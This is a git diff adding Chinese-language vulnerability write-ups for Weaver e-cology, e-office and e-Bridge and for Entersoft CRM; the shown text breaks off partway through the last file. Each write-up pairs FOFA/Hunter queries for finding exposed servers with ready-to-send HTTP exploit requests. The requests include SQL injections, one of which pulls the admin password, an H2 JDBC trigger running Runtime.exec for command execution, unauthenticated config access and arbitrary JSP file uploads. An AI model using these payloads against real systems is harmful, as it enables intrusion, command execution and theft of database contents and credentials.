+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Content-Type: application/json
+Accept: */*
+Origin: http://ip
+Referer: http://ip/
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+ETEAMSID: THIRD_18cd45709040d63b6b684d94b5773deb
+
+{"dbType":"mysql5","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\njava.lang.Runtime.getRuntime().exec(\"{cmd}\")$$"}
+```
+
+也可以通过上面第一步、第二步获取ETEAMSID值直接进入后台管理页面。
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/ACe_UhWsdUV3YPhUERcxsg
\ No newline at end of file
diff --git a/泛微e-cology9系统接口FileDownloadLocation接口存在SQL注入漏洞.md b/泛微e-cology9系统接口FileDownloadLocation接口存在SQL注入漏洞.md
new file mode 100644
index 0000000..67909a8
--- /dev/null
+++ b/泛微e-cology9系统接口FileDownloadLocation接口存在SQL注入漏洞.md
@@ -0,0 +1,19 @@
+# 泛微e-cology9系统接口FileDownloadLocation接口存在SQL注入漏洞
+泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology 9 x.FileDownloadLocation接口存在SQL注入漏洞
+
+## fofa
+```javascript
+body="doCheckPopupBlocked"
+```
+
+## poc
+```javascript
+GET /weaver/weaver.email.FileDownloadLocation/login/LoginSSOxjsp/x.FileDownloadLocation?ddcode=7ea7ef3c41d67297&downfiletype=eml&download=1&mailId=1123+union+select+*+from+(select+1+as+resourceid,'../ecology/WEB-INF/prop/mobilemode.properties'+as+x2,'3'+as+x3,(select++*+from+(select+*+from+(select+password+from+HrmResourceManager+where+id=1)x)x)+as+x4,5+as+x5,6+as+x6)x+where+1=1&mailid=action.WorkflowFnaEffectNew&parentid=0 HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate, br, zstd
+Accept: */*
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.0.0 Safari/537.36
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1734313084568-1d1365df-db66-42e7-b2ca-15e8f0de17bb.png)
+
diff --git a/泛微e-office-未授权访问.md b/泛微e-office-未授权访问.md
new file mode 100644
index 0000000..72c4ed1
--- /dev/null
+++ b/泛微e-office-未授权访问.md
@@ -0,0 +1,57 @@
+## 泛微e-office 未授权访问
+
+## fofa
+```
+(body="login.php"&&body="eoffice")||body="/general/login/index.php"
+icon_hash="1578525679"
+```
+
+## POC  yaml格式
+```
+detail:
+  ID: 5285
+  Author: 匿名作者
+  Name: 泛微e-office 未授权访问
+  Description: 泛微e-office是一种企业办公自动化软件解决方案，由中国的泛微网络科技股份有限公司开发和提供。它旨在帮助企业提高办公效率、优化业务流程和信息管理。泛微e-office
+    存在未授权访问，攻击者可以访问页面获取敏感信息。
+  Identifier:
+    DVB: DVB-2023-5285
+  VulnClass:
+  - 认证绕过/未认证
+  Category:
+  - 应用服务
+  Manufacturer: 泛微
+  Product: e-office
+  Type: 1
+  Status: 1
+  Scanable: 1
+  Level: 2
+  DisclosureDate: '2023-10-18'
+  Is0day: false
+  IncludeExp: false
+  Weakable: false
+  IsXc: false
+  IsCommon: false
+  IsCallBack: false
+  Condition: (body="login.php"&&body="eoffice")||body="/general/login/index.php"
+  Solutions:
+  - 请关注厂商的修复版本，并及时更新到最新版本.
+poc:
+  relative: req0
+  session: false
+  requests:
+  - method: GET
+    timeout: 10
+    path: /building/backmgr/urlpage/mobileurl/config_2.php
+    headers:
+      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
+        Gecko) Chrome/83.0.2597.132 Safari/537.36
+    follow_redirects: true
+    matches: (code.eq("200") && body.contains("数据库名") && body.contains("用户名"))
+```
+
+
+## 漏洞复现
+/building/backmgr/urlpage/mobileurl/config_2.php
+
+![](./assets/20231020132337.png)
diff --git a/泛微e-office系统sms_page.php接口存在sql注入漏洞.md b/泛微e-office系统sms_page.php接口存在sql注入漏洞.md
new file mode 100644
index 0000000..e8d3018
--- /dev/null
+++ b/泛微e-office系统sms_page.php接口存在sql注入漏洞.md
@@ -0,0 +1,25 @@
+
+# 泛微e-office系统sms_page.php接口存在sql注入漏洞
+
+泛微e-office系统在sms_page.php接口下存在sql注入漏洞
+
+## fofa
+
+```javascript
+((header="general/login/index.php" || body="/general/login/view//images/updateLoad.gif"    || (body="szFeatures" && body="eoffice") || header="Server: eOffice") && body!="Server:    couchdb") || banner="general/login/index.php"
+```
+
+## poc
+
+```javascript
+GET /E-mobile/sms_page.php?detailid=123%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7e,md5(123),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1
+Content-Type: application/json
+Host: 127.0.0.1
+
+
+GET /sms_page.php?detailid=123%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7e,md5(123),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1
+Content-Type: application/json
+Host: 127.0.0.1
+
+
+```
diff --git a/泛微ecology9系统接口ModeDateService存在SQL漏洞.md b/泛微ecology9系统接口ModeDateService存在SQL漏洞.md
new file mode 100644
index 0000000..b99ce71
--- /dev/null
+++ b/泛微ecology9系统接口ModeDateService存在SQL漏洞.md
@@ -0,0 +1,52 @@
+# 泛微ecology9系统接口ModeDateService存在SQL漏洞
+
+泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology9系统ModeDateService存在SQL注入漏洞。
+
+## fofa
+
+```yaml
+app="泛微-协同商务系统"
+```
+
+## hunter
+
+```yaml
+app.name=="泛微 e-cology 9.0 OA"
+```
+
+## poc
+
+```java
+POST /services/ModeDateService HTTP/1.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Referer: http://xxx//services/Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: ecology_JSessionid=aaasJ-HspHcxI5r2Krufz; JSESSIONID=aaasJ-HspHcxI5r2Krufz
+Connection: close
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: xxx 
+Content-Length: 405
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mod="http://localhost/services/ModeDateService">
+   <soapenv:Header/>   
+   <soapenv:Body>
+      <mod:getAllModeDataCount>
+		<mod:in0>1</mod:in0>         
+		<mod:in1>1</mod:in1>         
+		<mod:in2>1=1</mod:in2>         
+		<mod:in3>1</mod:in3>
+	  </mod:getAllModeDataCount>
+  </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![image-20240822185856455](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408221858526.png)
+
+![image-20240822185904629](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408221859693.png)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/2UkeRDbGaW0JGNQLfGSkRw
\ No newline at end of file
diff --git a/泛微ecology系统接口BlogService存在SQL注入漏洞.md b/泛微ecology系统接口BlogService存在SQL注入漏洞.md
new file mode 100644
index 0000000..7aa0f66
--- /dev/null
+++ b/泛微ecology系统接口BlogService存在SQL注入漏洞.md
@@ -0,0 +1,72 @@
+# 泛微ecology系统接口BlogService存在SQL注入漏洞
+
+泛微ecology系统接口`/services/BlogService`存在SQL注入漏洞
+
+## fofa
+
+```yaml
+app="泛微-OA（e-cology）"
+```
+
+## poc
+
+```java
+POST /services/BlogService HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: 
+Upgrade-Insecure-Requests: 1
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: 192.168.3.139
+Content-Length: 493
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.blog.weaver.com.cn">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <web:writeBlogReadFlag>
+         <web:string>1</web:string>
+         <web:string>注入点</web:string>
+         <web:string></web:string>
+      </web:writeBlogReadFlag>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+```java
+POST /services/BlogService HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: 
+Upgrade-Insecure-Requests: 1
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: 192.168.3.139
+Content-Length: 469
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.blog.weaver.com.cn">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <web:sendSubmitRemind>
+         <!--type: string-->
+         <web:in0>1</web:in0>
+         <!--type: string-->
+         <web:in1>2</web:in1>
+         <!--type: string-->
+         <web:in2>注入点</web:in2>
+      </web:sendSubmitRemind>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/4mJg0FuOOIBjZn-qTMSaeA
\ No newline at end of file
diff --git a/泛微云桥-e-Bridge-addTaste接口SQL注入漏洞.md b/泛微云桥-e-Bridge-addTaste接口SQL注入漏洞.md
new file mode 100644
index 0000000..94283b3
--- /dev/null
+++ b/泛微云桥-e-Bridge-addTaste接口SQL注入漏洞.md
@@ -0,0 +1,27 @@
+## 泛微云桥 e-Bridge addTaste接口SQL注入漏洞
+
+e-Bridge 提供了一套全面的办公自动化工具，包括文档管理、流程管理、协同办公、知识管理、移动办公等功能。它的核心理念是将企业内部的各种业务流程数字化，并通过云端技术实现跨部门、跨地域的协同办公和信息共享。该系统 addTaste接口存在SQL注入漏洞，通过此漏洞攻击者可获取企业数据库敏感数据。
+
+
+## fofa
+```
+app="泛微-云桥e-Bridge"
+```
+## hunter
+```
+app.name="泛微云桥 e-Bridge OA"
+```
+
+## poc
+```
+GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
+Accept: */*
+Cookie: EBRIDGE_JSESSIONID=CAE1276AE2279FD98B96C54DE624CD18; sl-session=BmCjG8ZweGWzoSGpQ1QgQg==; EBRIDGE_JSESSIONID=21D2D790531AD7941D060B411FABDC10
+Accept-Encoding: gzip
+SL-CE-SUID: 25
+```
+延迟时间大于5秒
+
+![0369e1c147602f35b76105a4f2aebd91](https://github.com/wy876/POC/assets/139549762/0aee421c-131e-4a03-b2d9-c046abdb27f2)
diff --git a/泛微云桥e-Bridge系统checkMobile存在SQL注入漏洞.md b/泛微云桥e-Bridge系统checkMobile存在SQL注入漏洞.md
new file mode 100644
index 0000000..f2e6abe
--- /dev/null
+++ b/泛微云桥e-Bridge系统checkMobile存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 泛微云桥e-Bridge系统checkMobile存在SQL注入漏洞
+泛微云桥e-Bridge 是一款办公自动化工具，主要提供文档管理、流程管理、协同办公、知识管理和移动办公等功能。它的目标是将企业内部的各种业务流程数字化，并通过云端技术实现跨部门、跨地域的协同办公和信息共享。该产品 checkMobile接口存在SQL注入漏洞，通过此漏洞攻击者可获取企业数据库敏感数据。
+
+## fofa
+```javascript
+app="泛微-云桥e-Bridge"
+```
+
+## poc
+```javascript
+POST /taste/checkMobile?company=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(5-(IF(18015%3E3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX&openid=1&source=1&userName=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+Accept-Encoding: gzip, deflate, br, zstd
+Accept: */*
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1734314946886-bc51d38e-16bd-4416-aa8c-56e40e24692a.png)
+
diff --git a/泛微云桥e-Bridge系统接口addTasteJsonp存在SQL注入漏洞.md b/泛微云桥e-Bridge系统接口addTasteJsonp存在SQL注入漏洞.md
new file mode 100644
index 0000000..e824e2a
--- /dev/null
+++ b/泛微云桥e-Bridge系统接口addTasteJsonp存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# 泛微云桥e-Bridge系统接口addTasteJsonp存在SQL注入漏洞
+
+泛微云桥e-Bridge是在“互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成平台。
+
+泛微-云桥e-Bridge addTasteJsonp 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息
+
+## fofa
+
+```javascript
+app="泛微云桥e-Bridge"
+```
+
+## poc
+
+```javascript
+GET /taste/addTasteJsonp?company=1&userName=1&jsonpcallback=1&mobile=1%27+AND+%28SELECT+6488+FROM+%28SELECT%28SLEEP%285%29%29%29CvMg%29+OR+%27JmLq%27%3D%27IpuI HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191452651.webp)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/Ej26hywx4po4sj3dSAVI_Q
\ No newline at end of file
diff --git a/浙大恩特CRMAuthorityJudgement存在SQL注入漏洞.md b/浙大恩特CRMAuthorityJudgement存在SQL注入漏洞.md
new file mode 100644
index 0000000..445ac45
--- /dev/null
+++ b/浙大恩特CRMAuthorityJudgement存在SQL注入漏洞.md
@@ -0,0 +1,37 @@
+# 浙大恩特CRM AuthorityJudgement存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理（CRM）系统。该系统旨在帮助企业高效管理客户关系，提升销售业绩，促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示，帮助企业深度挖掘客户数据，提供决策参考。浙大恩特CRM AuthorityJudgement存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="浙大恩特 CRM"`
++ 特征
+
+![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/9XAMe8BW3nTA1LAk/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-642664.png)
+
+# 四、漏洞复现
+```java
+POST /entsoft/PurchaseAction.entphone;.png?method=AuthorityJudgement HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Content-Length: 34
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+modNum=1';WAITFOR DELAY '0:0:1'--+
+```
+
+![1708515727567-73b86e53-cf50-4d3c-910e-e34dd603d2b2.png](./img/9XAMe8BW3nTA1LAk/1708515727567-73b86e53-cf50-4d3c-910e-e34dd603d2b2-798665.png)
+
+[浙大恩特客户资源管理系统-purchaseaction-entphone--sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222145208-7476e5e1-74ce-47c8-9fb1-8d44ebeec9ac.yaml)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ev7t9dcsd9ystmur>
\ No newline at end of file
diff --git a/浙大恩特CRMFollowAction存在SQL注入漏洞.md b/浙大恩特CRMFollowAction存在SQL注入漏洞.md
new file mode 100644
index 0000000..32206b7
--- /dev/null
+++ b/浙大恩特CRMFollowAction存在SQL注入漏洞.md
@@ -0,0 +1,36 @@
+# 浙大恩特CRM FollowAction存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理（CRM）系统。该系统旨在帮助企业高效管理客户关系，提升销售业绩，促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示，帮助企业深度挖掘客户数据，提供决策参考。浙大恩特CRM FollowAction存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="浙大恩特 CRM"`
++ 特征
+
+![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/m19IpcWC3G3B53u5/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-838671.png)
+
+# 四、漏洞复现
+```plain
+POST /entsoft/FollowAction.entphone;.js HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Connection: close
+Content-Length: 72
+Accept: */*
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+method=updreadFlg&trk_id=a&readFlag=a%27;WAITFOR%20DELAY%20%270:0:3%27--
+```
+
+![1708235641244-6376c3c0-87fe-47a6-bad0-3b0b2f987767.png](./img/m19IpcWC3G3B53u5/1708235641244-6376c3c0-87fe-47a6-bad0-3b0b2f987767-860254.png)
+
+[浙大恩特客户资源管理系统-followaction-entphone--sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222145263-d49b26ed-4e41-4352-b174-82a892d4332e.yaml)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zm2llrx2u25ytzk3>
\ No newline at end of file
diff --git a/浙大恩特CRMT0140_editActionSQL注入漏洞.md b/浙大恩特CRMT0140_editActionSQL注入漏洞.md
new file mode 100644
index 0000000..6945959
--- /dev/null
+++ b/浙大恩特CRMT0140_editActionSQL注入漏洞.md
@@ -0,0 +1,45 @@
+# 浙大恩特CRM T0140_editAction SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理（CRM）系统。该系统旨在帮助企业高效管理客户关系，提升销售业绩，促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示，帮助企业深度挖掘客户数据，提供决策参考。浙大恩特CRM T0140_editAction 存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">hunter</font>`<font style="color:rgba(0, 0, 0, 0.9);">app.name="浙大恩特 CRM"</font>`
++ <font style="color:rgba(0, 0, 0, 0.9);">特征</font>
+
+![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/f1wXP9KnVWY_4fwQ/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-053269.png)
+
+# <font style="color:rgba(0, 0, 0, 0.9);">四、漏洞复现</font>
+```plain
+GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1';waitfor+delay+'0:0:5'-- HTTP/1.1
+Host: xx.xx.xx.xx
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![1700315256759-7e924cad-9094-47c7-a60b-487d3bfd9a64.png](./img/f1wXP9KnVWY_4fwQ/1700315256759-7e924cad-9094-47c7-a60b-487d3bfd9a64-902360.png)
+
+sqlmap
+
+```plain
+GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1 HTTP/1.1
+Host: xx.xx.xx.xx
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![1700315422038-72774add-b8ed-4117-befd-062ca7dd8bbb.png](./img/f1wXP9KnVWY_4fwQ/1700315422038-72774add-b8ed-4117-befd-062ca7dd8bbb-897323.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pn2h4x4cw2ylpgty>
\ No newline at end of file
diff --git a/浙大恩特CRMfileupload.jsp任意文件上传漏洞.md b/浙大恩特CRMfileupload.jsp任意文件上传漏洞.md
new file mode 100644
index 0000000..c76fe51
--- /dev/null
+++ b/浙大恩特CRMfileupload.jsp任意文件上传漏洞.md
@@ -0,0 +1,46 @@
+# 浙大恩特CRM  fileupload.jsp 任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理（CRM）系统。该系统旨在帮助企业高效管理客户关系，提升销售业绩，促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示，帮助企业深度挖掘客户数据，提供决策参考。浙大恩特CRM fileupload.jsp存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器控制权限。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="浙大恩特 CRM"`
++ 特征
+
+![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/MNKDc3hnljdTlvOE/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-154874.png)
+
+# 四、漏洞复现
+```plain
+POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=123123.jsp HTTP/1.1
+Host: xx.xx.xx.xx
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=2511BA8347F6BD511B037A4B0C40DDE3; JSESSIONID=17BAFD608E509D1C96AF5715B9C0C235
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 4
+
+test
+```
+
+![1700146846618-56989d7b-0142-47ed-ba9c-3b4e5ce5728d.png](./img/MNKDc3hnljdTlvOE/1700146846618-56989d7b-0142-47ed-ba9c-3b4e5ce5728d-919392.png)
+
+上传文件位置
+
+```plain
+	/enterdoc/uploadfile/123123.jsp
+```
+
+![1700146879660-7bc87d16-6df6-426a-ae19-fce2cb505006.png](./img/MNKDc3hnljdTlvOE/1700146879660-7bc87d16-6df6-426a-ae19-fce2cb505006-245853.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gpf53pls4igr823a>
\ No newline at end of file
diff --git a/浙大恩特CRMloadFile任意文件上传漏洞.md b/浙大恩特CRMloadFile任意文件上传漏洞.md
new file mode 100644
index 0000000..bdb9792
--- /dev/null
+++ b/浙大恩特CRMloadFile任意文件上传漏洞.md
@@ -0,0 +1,48 @@
+# 浙大恩特CRM loadFile任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理（CRM）系统。该系统旨在帮助企业高效管理客户关系，提升销售业绩，促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示，帮助企业深度挖掘客户数据，提供决策参考。浙大恩特CRM loadFile存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器控制权限。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="浙大恩特 CRM"`
++ 特征
+
+![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/-A0quRyHPliStmt2/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-135267.png)
+
+# 四、漏洞复现
+```plain
+POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0  uacq
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A
+Content-Length: 203
+
+------WebKitFormBoundarye8FPHsIAq9JN8j2A
+Content-Disposition: form-data; name="file";filename="as.jsp"
+Content-Type: image/jpeg
+
+<%out.print("test");%>
+------WebKitFormBoundarye8FPHsIAq9JN8j2A--
+```
+
+![1700034671160-eec58ac8-f06c-4a3d-ab89-760a691e1eb2.png](./img/-A0quRyHPliStmt2/1700034671160-eec58ac8-f06c-4a3d-ab89-760a691e1eb2-488996.png)
+
+根据响应可知上传文件位置
+
+```plain
+  /enterdoc/gesnum/00003509/photo/as.jsp
+```
+
+![1700034711122-37b79faa-ab5b-4d49-88d2-1a76bab4f5a7.png](./img/-A0quRyHPliStmt2/1700034711122-37b79faa-ab5b-4d49-88d2-1a76bab4f5a7-729649.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/emyt65hk122k6rpq>
\ No newline at end of file
diff --git a/浙大恩特CRMmachord_doc任意文件上传漏洞.md b/浙大恩特CRMmachord_doc任意文件上传漏洞.md
new file mode 100644
index 0000000..ec3c957
--- /dev/null
+++ b/浙大恩特CRMmachord_doc任意文件上传漏洞.md
@@ -0,0 +1,66 @@
+# 浙大恩特CRM machord_doc任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理（CRM）系统。该系统旨在帮助企业高效管理客户关系，提升销售业绩，促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示，帮助企业深度挖掘客户数据，提供决策参考。浙大恩特CRM machord_doc存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器控制权限。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM</font>
+
